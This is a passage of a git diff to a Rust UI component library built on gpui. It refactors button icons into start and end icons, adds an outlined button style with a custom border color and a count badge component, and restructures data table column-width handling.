.toggle_state(is_selected) - .selected_icon(self.selected_icon) - .selected_icon_color(self.selected_icon_color) - .size(self.icon_size) - .color(self.icon_color) - })) + .when_some(self.end_icon, |this, icon| { + this.child(if is_disabled { + icon.color(Color::Disabled) + } else { + icon + }) }), ) } @@ -585,24 +540,28 @@ impl Component for Button { "Buttons with Icons", vec![ single_example( - "Icon Start", - Button::new("icon_start", "Icon Start") - .icon(IconName::Check) - .icon_position(IconPosition::Start) + "Start Icon", + Button::new("icon_start", "Start Icon") + .start_icon(Icon::new(IconName::Check)) + .into_any_element(), + ), + single_example( + "End Icon", + Button::new("icon_end", "End Icon") + .end_icon(Icon::new(IconName::Check)) .into_any_element(), ), single_example( - "Icon End", - Button::new("icon_end", "Icon End") - .icon(IconName::Check) - .icon_position(IconPosition::End) + "Both Icons", + Button::new("both_icons", "Both Icons") + .start_icon(Icon::new(IconName::Check)) + .end_icon(Icon::new(IconName::ChevronDown)) .into_any_element(), ), single_example( "Icon Color", Button::new("icon_color", "Icon Color") - .icon(IconName::Check) - .icon_color(Color::Accent) + .start_icon(Icon::new(IconName::Check).color(Color::Accent)) .into_any_element(), ), ], diff --git a/crates/ui/src/components/button/button_icon.rs b/crates/ui/src/components/button/button_icon.rs deleted file mode 100644 index 510c418714575112070e64e945da3e185f37ee3e..0000000000000000000000000000000000000000 --- a/crates/ui/src/components/button/button_icon.rs +++ /dev/null @@ -1,199 +0,0 @@ -use crate::{Icon, IconName, IconSize, IconWithIndicator, Indicator, prelude::*}; -use gpui::Hsla; - -/// An icon that appears within a button. -/// -/// Can be used as either an icon alongside a label, like in [`Button`](crate::Button), -/// or as a standalone icon, like in [`IconButton`](crate::IconButton). -#[derive(IntoElement, RegisterComponent)] -pub(super) struct ButtonIcon { - icon: IconName, - size: IconSize, - color: Color, - disabled: bool, - selected: bool, - selected_icon: Option, - selected_icon_color: Option, - selected_style: Option, - indicator: Option, - indicator_border_color: Option, -} - -impl ButtonIcon { - pub fn new(icon: IconName) -> Self { - Self { - icon, - size: IconSize::default(), - color: Color::default(), - disabled: false, - selected: false, - selected_icon: None, - selected_icon_color: None, - selected_style: None, - indicator: None, - indicator_border_color: None, - } - } - - pub fn size(mut self, size: impl Into>) -> Self { - if let Some(size) = size.into() { - self.size = size; - } - self - } - - pub fn color(mut self, color: impl Into>) -> Self { - if let Some(color) = color.into() { - self.color = color; - } - self - } - - pub fn selected_icon(mut self, icon: impl Into>) -> Self { - self.selected_icon = icon.into(); - self - } - - pub fn selected_icon_color(mut self, color: impl Into>) -> Self { - self.selected_icon_color = color.into(); - self - } - - pub fn indicator(mut self, indicator: Indicator) -> Self { - self.indicator = Some(indicator); - self - } - - pub fn indicator_border_color(mut self, color: Option) -> Self { - self.indicator_border_color = color; - self - } -} - -impl Disableable for ButtonIcon { - fn disabled(mut self, disabled: bool) -> Self { - self.disabled = disabled; - self - } -} - -impl Toggleable for ButtonIcon { - fn toggle_state(mut self, selected: bool) -> Self { - self.selected = selected; - self - } -} - -impl SelectableButton for ButtonIcon { - fn selected_style(mut self, style: ButtonStyle) -> Self { - self.selected_style = Some(style); - self - } -} - -impl RenderOnce for ButtonIcon { - fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement { - let icon = self - .selected_icon - .filter(|_| self.selected) - .unwrap_or(self.icon); - - let icon_color = if self.disabled { - Color::Disabled - } else if self.selected_style.is_some() && self.selected { - self.selected_style.unwrap().into() - } else if self.selected { - self.selected_icon_color.unwrap_or(Color::Selected) - } else { - self.color - }; - - let icon = Icon::new(icon).size(self.size).color(icon_color); - - match self.indicator { - Some(indicator) => IconWithIndicator::new(icon, Some(indicator)) - .indicator_border_color(self.indicator_border_color) - .into_any_element(), - None => icon.into_any_element(), - } - } -} - -impl Component for ButtonIcon { - fn scope() -> ComponentScope { - ComponentScope::Input - } - - fn name() -> &'static str { - "ButtonIcon" - } - - fn description() -> Option<&'static str> { - Some("An icon component specifically designed for use within buttons.") - } - - fn preview(_window: &mut Window, _cx: &mut App) -> Option { - Some( - v_flex() - .gap_6() - .children(vec![ - example_group_with_title( - "Basic Usage", - vec![ - single_example( - "Default", - ButtonIcon::new(IconName::Star).into_any_element(), - ), - single_example( - "Custom Size", - ButtonIcon::new(IconName::Star) - .size(IconSize::Medium) - .into_any_element(), - ), - single_example( - "Custom Color", - ButtonIcon::new(IconName::Star) - .color(Color::Accent) - .into_any_element(), - ), - ], - ), - example_group_with_title( - "States", - vec![ - single_example( - "Selected", - ButtonIcon::new(IconName::Star) - .toggle_state(true) - .into_any_element(), - ), - single_example( - "Disabled", - ButtonIcon::new(IconName::Star) - .disabled(true) - .into_any_element(), - ), - ], - ), - example_group_with_title( - "With Indicator", - vec![ - single_example( - "Default Indicator", - ButtonIcon::new(IconName::Star) - .indicator(Indicator::dot()) - .into_any_element(), - ), - single_example( - "Custom Indicator", - ButtonIcon::new(IconName::Star) - .indicator(Indicator::dot().color(Color::Error)) - .into_any_element(), - ), - ], - ), - ]) - .into_any_element(), - ) - } -} diff --git a/crates/ui/src/components/button/button_like.rs b/crates/ui/src/components/button/button_like.rs index 9cb7bd85ef1dbcdf16b821d61b7fe02800b8e182..2b0fa20683cce462cb998e59be95731f7f214cec 100644 --- a/crates/ui/src/components/button/button_like.rs +++ b/crates/ui/src/components/button/button_like.rs @@ -138,6 +138,9 @@ pub enum ButtonStyle { /// A more de-emphasized version of the outlined button. OutlinedGhost, + /// Like [`ButtonStyle::Outlined`], but with a caller-provided border color. + OutlinedCustom(Hsla), + /// The default button style, used for most buttons. Has a transparent background, /// but has a background color to indicate states like hover and active. #[default] @@ -230,6 +233,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: transparent_black(), + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Subtle => ButtonLikeStyles { background: cx.theme().colors().ghost_element_background, border_color: transparent_black(), @@ -280,6 +289,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: cx.theme().colors().ghost_element_hover, + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Subtle => ButtonLikeStyles { background: cx.theme().colors().ghost_element_hover, border_color: transparent_black(), @@ -324,6 +339,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: cx.theme().colors().element_active, + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Transparent => ButtonLikeStyles { background: transparent_black(), border_color: transparent_black(), @@ -363,6 +384,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(border_color) => ButtonLikeStyles { + background: cx.theme().colors().ghost_element_background, + border_color, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Transparent => ButtonLikeStyles { background: transparent_black(), border_color: cx.theme().colors().border_focused, @@ -405,6 +432,12 @@ impl ButtonStyle { label_color: Color::Default.color(cx), icon_color: Color::Default.color(cx), }, + ButtonStyle::OutlinedCustom(_) => ButtonLikeStyles { + background: cx.theme().colors().element_disabled, + border_color: cx.theme().colors().border_disabled, + label_color: Color::Default.color(cx), + icon_color: Color::Default.color(cx), + }, ButtonStyle::Transparent => ButtonLikeStyles { background: transparent_black(), border_color: transparent_black(), @@ -640,7 +673,7 @@ impl RenderOnce for ButtonLike { let is_outlined = matches!( self.style, - ButtonStyle::Outlined | ButtonStyle::OutlinedGhost + ButtonStyle::Outlined | ButtonStyle::OutlinedGhost | ButtonStyle::OutlinedCustom(_) ); self.base diff --git a/crates/ui/src/components/button/icon_button.rs b/crates/ui/src/components/button/icon_button.rs index 961176ed6cee7e55c7a51cd52719c0eef8a8f181..a103ddf169a8ba3ed9d1b6bf6055ff84858aef7d 100644 --- a/crates/ui/src/components/button/icon_button.rs +++ b/crates/ui/src/components/button/icon_button.rs @@ -1,11 +1,11 @@ use gpui::{AnyView, DefiniteLength, Hsla}; use super::button_like::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle}; -use crate::{ElevationIndex, Indicator, SelectableButton, TintColor, prelude::*}; +use crate::{ + ElevationIndex, Icon, IconWithIndicator, Indicator, SelectableButton, TintColor, prelude::*, +}; use crate::{IconName, IconSize}; -use super::button_icon::ButtonIcon; - /// The shape of an [`IconButton`]. #[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] pub enum IconButtonShape { @@ -22,6 +22,7 @@ pub struct IconButton { icon_color: Color, selected_icon: Option, selected_icon_color: Option, + selected_style: Option, indicator: Option, indicator_border_color: Option, alpha: Option, @@ -37,6 +38,7 @@ impl IconButton { icon_color: Color::Default, selected_icon: None, selected_icon_color: None, + selected_style: None, indicator: None, indicator_border_color: None, alpha: None, @@ -112,6 +114,7 @@ impl Toggleable for IconButton { impl SelectableButton for IconButton { fn selected_style(mut self, style: ButtonStyle) -> Self { + self.selected_style = Some(style); self.base = self.base.selected_style(style); self } @@ -192,9 +195,25 @@ impl RenderOnce for IconButton { fn render(self, window: &mut Window, cx: &mut App) -> ButtonLike { let is_disabled = self.base.disabled; let is_selected = self.base.selected; - let selected_style = self.base.selected_style; - let color = self.icon_color.color(cx).opacity(self.alpha.unwrap_or(1.0)); + let icon = self + .selected_icon + .filter(|_| is_selected) + .unwrap_or(self.icon); + + let icon_color = if is_disabled { + Color::Disabled + } else if self.selected_style.is_some() && is_selected { + self.selected_style.unwrap().into() + } else if is_selected { + self.selected_icon_color.unwrap_or(Color::Selected) + } else { + let base_color = self.icon_color.color(cx); + Color::Custom(base_color.opacity(self.alpha.unwrap_or(1.0))) + }; + + let icon_element = Icon::new(icon).size(self.icon_size).color(icon_color); + self.base .map(|this| match self.shape { IconButtonShape::Square => { @@ -203,20 +222,12 @@ impl RenderOnce for IconButton { } IconButtonShape::Wide => this, }) - .child( - ButtonIcon::new(self.icon) - .disabled(is_disabled) - .toggle_state(is_selected) - .selected_icon(self.selected_icon) - .selected_icon_color(self.selected_icon_color) - .when_some(selected_style, |this, style| this.selected_style(style)) - .when_some(self.indicator, |this, indicator| { - this.indicator(indicator) - .indicator_border_color(self.indicator_border_color) - }) - .size(self.icon_size) - .color(Color::Custom(color)), - ) + .child(match self.indicator { + Some(indicator) => IconWithIndicator::new(icon_element, Some(indicator)) + .indicator_border_color(self.indicator_border_color) + .into_any_element(), + None => icon_element.into_any_element(), + }) } } diff --git a/crates/ui/src/components/callout.rs b/crates/ui/src/components/callout.rs index 24762ec1765a58259b061194ea31ed7e8721c2a0..23c820cd545adff2985a4116a6efb00c1e731693 100644 --- a/crates/ui/src/components/callout.rs +++ b/crates/ui/src/components/callout.rs @@ -295,7 +295,7 @@ impl Component for Callout { "Error details:", "• Quota exceeded for metric", "• Limit: 0", - "• Model: gemini-3-pro", + "• Model: gemini-3.1-pro", "Please retry in 26.33s.", "Additional details:", "- Request ID: abc123def456", diff --git a/crates/ui/src/components/chip.rs b/crates/ui/src/components/chip.rs index ce709fe3962f742f5208808315f3bdac09c1f513..06dc7e6afa6fa8723985913dfece4205e360511e 100644 --- a/crates/ui/src/components/chip.rs +++ b/crates/ui/src/components/chip.rs @@ -81,8 +81,7 @@ impl RenderOnce for Chip { h_flex() .when_some(self.height, |this, h| this.h(h)) - .min_w_0() - .flex_initial() + .flex_none() .px_1() .border_1() .rounded_sm() diff --git a/crates/ui/src/components/context_menu.rs b/crates/ui/src/components/context_menu.rs index f055777faa7149ec46076ea42c565b65d3a1ed68..2fcfd73b93d7c47018819fd9ec4426e9f1b38147 100644 --- a/crates/ui/src/components/context_menu.rs +++ b/crates/ui/src/components/context_menu.rs @@ -8,14 +8,12 @@ use gpui::{ Subscription, anchored, canvas, prelude::*, px, }; use menu::{SelectChild, SelectFirst, SelectLast, SelectNext, SelectParent, SelectPrevious}; -use settings::Settings; use std::{ cell::{Cell, RefCell}, collections::HashMap, rc::Rc, time::{Duration, Instant}, }; -use theme::ThemeSettings; #[derive(Copy, Clone, Debug, PartialEq, Eq)] enum SubmenuOpenTrigger { @@ -692,10 +690,20 @@ impl ContextMenu { } pub fn action_checked( + self, + label: impl Into, + action: Box, + checked: bool, + ) -> Self { + self.action_checked_with_disabled(label, action, checked, false) + } + + pub fn action_checked_with_disabled( mut self, label: impl Into, action: Box, checked: bool, + disabled: bool, ) -> Self { self.items.push(ContextMenuItem::Entry(ContextMenuEntry { toggle: if checked { @@ -718,7 +726,7 @@ impl ContextMenu { icon_position: IconPosition::End, icon_size: IconSize::Small, icon_color: None, - disabled: false, + disabled, documentation_aside: None, end_slot_icon: None, end_slot_title: None, @@ -2040,7 +2048,7 @@ impl ContextMenuItem { impl Render for ContextMenu { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let ui_font_size = ThemeSettings::get_global(cx).ui_font_size(cx); + let ui_font_size = theme::theme_settings(cx).ui_font_size(cx); let window_size = window.viewport_size(); let rem_size = window.rem_size(); let is_wide_window = window_size.width / rem_size > rems_from_px(800.).0; diff --git a/crates/ui/src/components/count_badge.rs b/crates/ui/src/components/count_badge.rs new file mode 100644 index 0000000000000000000000000000000000000000..c546d69e6d15b12e75ff94424b03b82f371ac94a --- /dev/null +++ b/crates/ui/src/components/count_badge.rs @@ -0,0 +1,93 @@ +use gpui::FontWeight; + +use crate::prelude::*; + +/// A small, pill-shaped badge that displays a numeric count. +/// +/// The count is capped at 99 and displayed as "99+" beyond that. +#[derive(IntoElement, RegisterComponent)] +pub struct CountBadge { + count: usize, +} + +impl CountBadge { + pub fn new(count: usize) -> Self { + Self { count } + } +} + +impl RenderOnce for CountBadge { + fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { + let label = if self.count > 99 { + "99+".to_string() + } else { + self.count.to_string() + }; + + let bg = cx + .theme() + .colors() + .editor_background + .blend(cx.theme().status().error.opacity(0.4)); + + h_flex() + .absolute() + .top_0() + .right_0() + .p_px() + .h_3p5() + .min_w_3p5() + .rounded_full() + .justify_center() + .text_center() + .border_1() + .border_color(cx.theme().colors().border) + .bg(bg) + .shadow_sm() + .child( + Label::new(label) + .size(LabelSize::Custom(rems_from_px(9.))) + .weight(FontWeight::MEDIUM), + ) + } +} + +impl Component for CountBadge { + fn scope() -> ComponentScope { + ComponentScope::Status + } + + fn description() -> Option<&'static str> { + Some("A small, pill-shaped badge that displays a numeric count.") + } + + fn preview(_window: &mut Window, cx: &mut App) -> Option { + let container = || { + div() + .relative() + .size_8() + .border_1() + .border_color(cx.theme().colors().border) + .bg(cx.theme().colors().background) + }; + + Some( + v_flex() + .gap_6() + .child(example_group_with_title( + "Count Badge", + vec![ + single_example( + "Basic Count", + container().child(CountBadge::new(3)).into_any_element(), + ), + single_example( + "Capped Count", + container().child(CountBadge::new(150)).into_any_element(), + ), + ], + )) + .into_any_element(), + ) + } +} diff --git a/crates/ui/src/components/data_table.rs b/crates/ui/src/components/data_table.rs index 8a40c246ca44ea9dbb25e61bb611882343ba7f94..e5a14a3ddabc0d918bfe6d6bcb077e32adeb6eb4 100644 --- a/crates/ui/src/components/data_table.rs +++ b/crates/ui/src/components/data_table.rs @@ -1,235 +1,31 @@ use std::{ops::Range, rc::Rc}; use gpui::{ - AbsoluteLength, AppContext, Context, DefiniteLength, DragMoveEvent, Entity, EntityId, - FocusHandle, Length, ListHorizontalSizingBehavior, ListSizingBehavior, ListState, Point, - Stateful, UniformListScrollHandle, WeakEntity, list, transparent_black, uniform_list, + DefiniteLength, Entity, EntityId, FocusHandle, Length, ListHorizontalSizingBehavior, + ListSizingBehavior, ListState, Point, Stateful, UniformListScrollHandle, WeakEntity, list, + transparent_black, uniform_list, }; use crate::{ ActiveTheme as _, AnyElement, App, Button, ButtonCommon as _, ButtonStyle, Color, Component, - ComponentScope, Div, ElementId, FixedWidth as _, FluentBuilder as _, Indicator, - InteractiveElement, IntoElement, ParentElement, Pixels, RegisterComponent, RenderOnce, - ScrollAxes, ScrollableHandle, Scrollbars, SharedString, StatefulInteractiveElement, Styled, - StyledExt as _, StyledTypography, Window, WithScrollbar, div, example_group_with_title, h_flex, - px, single_example, + ComponentScope, Context, Div, ElementId, FixedWidth as _, FluentBuilder as _, HeaderResizeInfo, + Indicator, InteractiveElement, IntoElement, ParentElement, Pixels, RedistributableColumnsState, + RegisterComponent, RenderOnce, ScrollAxes, ScrollableHandle, Scrollbars, SharedString, + StatefulInteractiveElement, Styled, StyledExt as _, StyledTypography, Window, WithScrollbar, + bind_redistributable_columns, div, example_group_with_title, h_flex, px, + render_redistributable_columns_resize_handles, single_example, table_row::{IntoTableRow as _, TableRow}, v_flex, }; -use itertools::intersperse_with; - -pub mod table_row { - //! A newtype for a table row that enforces a fixed column count at runtime. - //! - //! This type ensures that all rows in a table have the same width, preventing accidental creation or mutation of rows with inconsistent lengths. - //! It is especially useful for CSV or tabular data where rectangular invariants must be maintained, but the number of columns is only known at runtime. - //! By using `TableRow`, we gain stronger guarantees and safer APIs compared to a bare `Vec`, without requiring const generics. - - use std::{ - any::type_name, - ops::{ - Index, IndexMut, Range, RangeFrom, RangeFull, RangeInclusive, RangeTo, RangeToInclusive, - }, - }; - - #[derive(Clone, Debug, PartialEq, Eq)] - pub struct TableRow(Vec); - - impl TableRow { - /// Constructs a `TableRow` from a `Vec`, panicking if the length does not match `expected_length`. - /// - /// Use this when you want to ensure at construction time that the row has the correct number of columns. - /// This enforces the rectangular invariant for table data, preventing accidental creation of malformed rows. - /// - /// # Panics - /// Panics if `data.len() != expected_length`. - pub fn from_vec(data: Vec, expected_length: usize) -> Self { - Self::try_from_vec(data, expected_length).unwrap_or_else(|e| { - let name = type_name::>(); - panic!("Expected {name} to be created successfully: {e}"); - }) - } - - /// Attempts to construct a `TableRow` from a `Vec`, returning an error if the length does not match `expected_len`. - /// - /// This is a fallible alternative to `from_vec`, allowing you to handle inconsistent row lengths gracefully. - /// Returns `Ok(TableRow)` if the length matches, or an `Err` with a descriptive message otherwise. - pub fn try_from_vec(data: Vec, expected_len: usize) -> Result { - if data.len() != expected_len { - Err(format!( - "Row length {} does not match expected {}", - data.len(), - expected_len - )) - } else { - Ok(Self(data)) - } - } - - /// Returns reference to element by column index. - /// - /// # Panics - /// Panics if `col` is out of bounds (i.e., `col >= self.cols()`). - pub fn expect_get(&self, col: usize) -> &T { - self.0.get(col).unwrap_or_else(|| { - panic!( - "Expected table row of `{}` to have {col:?}", - type_name::() - ) - }) - } - - pub fn get(&self, col: usize) -> Option<&T> { - self.0.get(col) - } - - pub fn as_slice(&self) -> &[T] { - &self.0 - } - - pub fn into_vec(self) -> Vec { - self.0 - } - - /// Like [`map`], but borrows the row and clones each element before mapping. - /// - /// This is useful when you want to map over a borrowed row without consuming it, - /// but your mapping function requires ownership of each element. - /// - /// # Difference - /// - `map_cloned` takes `&self`, clones each element, and applies `f(T) -> U`. - /// - [`map`] takes `self` by value and applies `f(T) -> U` directly, consuming the row. - /// - [`map_ref`] takes `&self` and applies `f(&T) -> U` to references of each element. - pub fn map_cloned(&self, f: F) -> TableRow - where - F: FnMut(T) -> U, - T: Clone, - { - self.clone().map(f) - } - - /// Consumes the row and transforms all elements within it in a length-safe way. - /// - /// # Difference - /// - `map` takes ownership of the row (`self`) and applies `f(T) -> U` to each element. - /// - Use this when you want to transform and consume the row in one step. - /// - See also [`map_cloned`] (for mapping over a borrowed row with cloning) and [`map_ref`] (for mapping over references). - pub fn map(self, f: F) -> TableRow - where - F: FnMut(T) -> U, - { - TableRow(self.0.into_iter().map(f).collect()) - } - - /// Borrows the row and transforms all elements by reference in a length-safe way. - /// - /// # Difference - /// - `map_ref` takes `&self` and applies `f(&T) -> U` to each element by reference. - /// - Use this when you want to map over a borrowed row without cloning or consuming it. - /// - See also [`map`] (for consuming the row) and [`map_cloned`] (for mapping with cloning). - pub fn map_ref(&self, f: F) -> TableRow - where - F: FnMut(&T) -> U, - { - TableRow(self.0.iter().map(f).collect()) - } - - /// Number of columns (alias to `len()` with more semantic meaning) - pub fn cols(&self) -> usize { - self.0.len() - } - } - - ///// Convenience traits ///// - pub trait IntoTableRow { - fn into_table_row(self, expected_length: usize) -> TableRow; - } - impl IntoTableRow for Vec { - fn into_table_row(self, expected_length: usize) -> TableRow { - TableRow::from_vec(self, expected_length) - } - } - - // Index implementations for convenient access - impl Index for TableRow { - type Output = T; - - fn index(&self, index: usize) -> &Self::Output { - &self.0[index] - } - } - impl IndexMut for TableRow { - fn index_mut(&mut self, index: usize) -> &mut Self::Output { - &mut self.0[index] - } - } - - // Range indexing implementations for slice operations - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: Range) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeFrom) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeTo) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeToInclusive) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl Index for TableRow { - type Output = [T]; - - fn index(&self, index: RangeFull) -> &Self::Output { - as Index>::index(&self.0, index) - } - } - - impl Index> for TableRow { - type Output = [T]; - - fn index(&self, index: RangeInclusive) -> &Self::Output { - as Index>>::index(&self.0, index) - } - } - - impl IndexMut> for TableRow { - fn index_mut(&mut self, index: RangeInclusive) -> &mut Self::Output { - as IndexMut>>::index_mut(&mut self.0, index) - } - } -} - -const RESIZE_COLUMN_WIDTH: f32 = 8.0; +pub mod table_row; +#[cfg(test)] +mod tests; /// Represents an unchecked table row, which is a vector of elements. /// Will be converted into `TableRow` internally pub type UncheckedTableRow = Vec; -#[derive(Debug)] -struct DraggedColumn(usize); - struct UniformListData { render_list_of_rows_fn: Box, &mut Window, &mut App) -> Vec>>, @@ -309,414 +105,105 @@ impl TableInteractionState { view.update(cx, |view, cx| f(view, e, window, cx)).ok(); } } - - /// Renders invisible resize handles overlaid on top of table content. - /// - /// - Spacer: invisible element that matches the width of table column content - /// - Divider: contains the actual resize handle that users can drag to resize columns - /// - /// Structure: [spacer] [divider] [spacer] [divider] [spacer] - /// - /// Business logic: - /// 1. Creates spacers matching each column width - /// 2. Intersperses (inserts) resize handles between spacers (interactive only for resizable columns) - /// 3. Each handle supports hover highlighting, double-click to reset, and drag to resize - /// 4. Returns an absolute-positioned overlay that sits on top of table content - fn render_resize_handles( - &self, - column_widths: &TableRow, - resizable_columns: &TableRow, - initial_sizes: &TableRow, - columns: Option>, - window: &mut Window, - cx: &mut App, - ) -> AnyElement { - let spacers = column_widths - .as_slice() - .iter() - .map(|width| base_cell_style(Some(*width)).into_any_element()); - - let mut column_ix = 0; - let resizable_columns_shared = Rc::new(resizable_columns.clone()); - let initial_sizes_shared = Rc::new(initial_sizes.clone()); - let mut resizable_columns_iter = resizable_columns.as_slice().iter(); - - // Insert dividers between spacers (column content) - let dividers = intersperse_with(spacers, || { - let resizable_columns = Rc::clone(&resizable_columns_shared); - let initial_sizes = Rc::clone(&initial_sizes_shared); - window.with_id(column_ix, |window| { - let mut resize_divider = div() - // This is required because this is evaluated at a different time than the use_state call above - .id(column_ix) - .relative() - .top_0() - .w_px() - .h_full() - .bg(cx.theme().colors().border.opacity(0.8)); - - let mut resize_handle = div() - .id("column-resize-handle") - .absolute() - .left_neg_0p5() - .w(px(RESIZE_COLUMN_WIDTH)) - .h_full(); - - if resizable_columns_iter - .next() - .is_some_and(TableResizeBehavior::is_resizable) - { - let hovered = window.use_state(cx, |_window, _cx| false); - - resize_divider = resize_divider.when(*hovered.read(cx), |div| { - div.bg(cx.theme().colors().border_focused) - }); - - resize_handle = resize_handle - .on_hover(move |&was_hovered, _, cx| hovered.write(cx, was_hovered)) - .cursor_col_resize() - .when_some(columns.clone(), |this, columns| { - this.on_click(move |event, window, cx| { - if event.click_count() >= 2 { - columns.update(cx, |columns, _| { - columns.on_double_click( - column_ix, - &initial_sizes, - &resizable_columns, - window, - ); - }) - } - - cx.stop_propagation(); - }) - }) - .on_drag(DraggedColumn(column_ix), |_, _offset, _window, cx| { - cx.new(|_cx| gpui::Empty) - }) - } - - column_ix += 1; - resize_divider.child(resize_handle).into_any_element() - }) - }); - - h_flex() - .id("resize-handles") - .absolute() - .inset_0() - .w_full() - .children(dividers) - .into_any_element() - } } -#[derive(Debug, Copy, Clone, PartialEq)] -pub enum TableResizeBehavior { - None, - Resizable, - MinSize(f32), +pub enum ColumnWidthConfig { + /// Static column widths (no resize handles). + Static { + widths: StaticColumnWidths, + /// Controls widths of the whole table. + table_width: Option, + }, + /// Redistributable columns — dragging redistributes the fixed available space + /// among columns without changing the overall table width. + Redistributable { + columns_state: Entity, + table_width: Option, + }, } -impl TableResizeBehavior { - pub fn is_resizable(&self) -> bool { - *self != TableResizeBehavior::None - } - - pub fn min_size(&self) -> Option { - match self { - TableResizeBehavior::None => None, - TableResizeBehavior::Resizable => Some(0.05), - TableResizeBehavior::MinSize(min_size) => Some(*min_size), - } - } +pub enum StaticColumnWidths { + /// All columns share space equally (flex-1 / Length::Auto). + Auto, + /// Each column has a specific width. + Explicit(TableRow), } -pub struct TableColumnWidths { - widths: TableRow, - visible_widths: TableRow, - cached_bounds_width: Pixels, - initialized: bool, -} - -impl TableColumnWidths { - pub fn new(cols: usize, _: &mut App) -> Self { - Self { - widths: vec![DefiniteLength::default(); cols].into_table_row(cols), - visible_widths: vec![DefiniteLength::default(); cols].into_table_row(cols), - cached_bounds_width: Default::default(), - initialized: false, - } - } - - pub fn cols(&self) -> usize { - self.widths.cols() - } - - fn get_fraction(length: &DefiniteLength, bounds_width: Pixels, rem_size: Pixels) -> f32 { - match length { - DefiniteLength::Absolute(AbsoluteLength::Pixels(pixels)) => *pixels / bounds_width, - DefiniteLength::Absolute(AbsoluteLength::Rems(rems_width)) => { - rems_width.to_pixels(rem_size) / bounds_width - } - DefiniteLength::Fraction(fraction) => *fraction, +impl ColumnWidthConfig { + /// Auto-width columns, auto-size table. + pub fn auto() -> Self { + ColumnWidthConfig::Static { + widths: StaticColumnWidths::Auto, + table_width: None, } } - fn on_double_click( - &mut self, - double_click_position: usize, - initial_sizes: &TableRow, - resize_behavior: &TableRow, - window: &mut Window, - ) { - let bounds_width = self.cached_bounds_width; - let rem_size = window.rem_size(); - let initial_sizes = - initial_sizes.map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); - let widths = self - .widths - .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); - - let updated_widths = Self::reset_to_initial_size( - double_click_position, - widths, - initial_sizes, - resize_behavior, - ); - self.widths = updated_widths.map(DefiniteLength::Fraction); - self.visible_widths = self.widths.clone(); // previously was copy - } - - fn reset_to_initial_size( - col_idx: usize, - mut widths: TableRow, - initial_sizes: TableRow, - resize_behavior: &TableRow, - ) -> TableRow { - // RESET: - // Part 1: - // Figure out if we should shrink/grow the selected column - // Get diff which represents the change in column we want to make initial size delta curr_size = diff - // - // Part 2: We need to decide which side column we should move and where - // - // If we want to grow our column we should check the left/right columns diff to see what side - // has a greater delta than their initial size. Likewise, if we shrink our column we should check - // the left/right column diffs to see what side has the smallest delta. - // - // Part 3: resize - // - // col_idx represents the column handle to the right of an active column - // - // If growing and right has the greater delta { - // shift col_idx to the right - // } else if growing and left has the greater delta { - // shift col_idx - 1 to the left - // } else if shrinking and the right has the greater delta { - // shift - // } { - // - // } - // } - // - // if we need to shrink, then if the right - // - - // DRAGGING - // we get diff which represents the change in the _drag handle_ position - // -diff => dragging left -> - // grow the column to the right of the handle as much as we can shrink columns to the left of the handle - // +diff => dragging right -> growing handles column - // grow the column to the left of the handle as much as we can shrink columns to the right of the handle - // - - let diff = initial_sizes[col_idx] - widths[col_idx]; - - let left_diff = - initial_sizes[..col_idx].iter().sum::() - widths[..col_idx].iter().sum::(); - let right_diff = initial_sizes[col_idx + 1..].iter().sum::() - - widths[col_idx + 1..].iter().sum::(); - - let go_left_first = if diff < 0.0 { - left_diff > right_diff - } else { - left_diff < right_diff - }; - - if !go_left_first { - let diff_remaining = - Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, 1); - - if diff_remaining != 0.0 && col_idx > 0 { - Self::propagate_resize_diff( - diff_remaining, - col_idx, - &mut widths, - resize_behavior, - -1, - ); - } - } else { - let diff_remaining = - Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, -1); - - if diff_remaining != 0.0 { - Self::propagate_resize_diff( - diff_remaining, - col_idx, - &mut widths, - resize_behavior, - 1, - ); - } + /// Redistributable columns with no fixed table width. + pub fn redistributable(columns_state: Entity) -> Self { + ColumnWidthConfig::Redistributable { + columns_state, + table_width: None, } - - widths } - fn on_drag_move( - &mut self, - drag_event: &DragMoveEvent, - resize_behavior: &TableRow, - window: &mut Window, - cx: &mut Context, - ) { - let drag_position = drag_event.event.position; - let bounds = drag_event.bounds; - - let mut col_position = 0.0; - let rem_size = window.rem_size(); - let bounds_width = bounds.right() - bounds.left(); - let col_idx = drag_event.drag(cx).0; - - let column_handle_width = Self::get_fraction( - &DefiniteLength::Absolute(AbsoluteLength::Pixels(px(RESIZE_COLUMN_WIDTH))), - bounds_width, - rem_size, - ); - - let mut widths = self - .widths - .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); - - for length in widths[0..=col_idx].iter() { - col_position += length + column_handle_width; + /// Auto-width columns, fixed table width. + pub fn 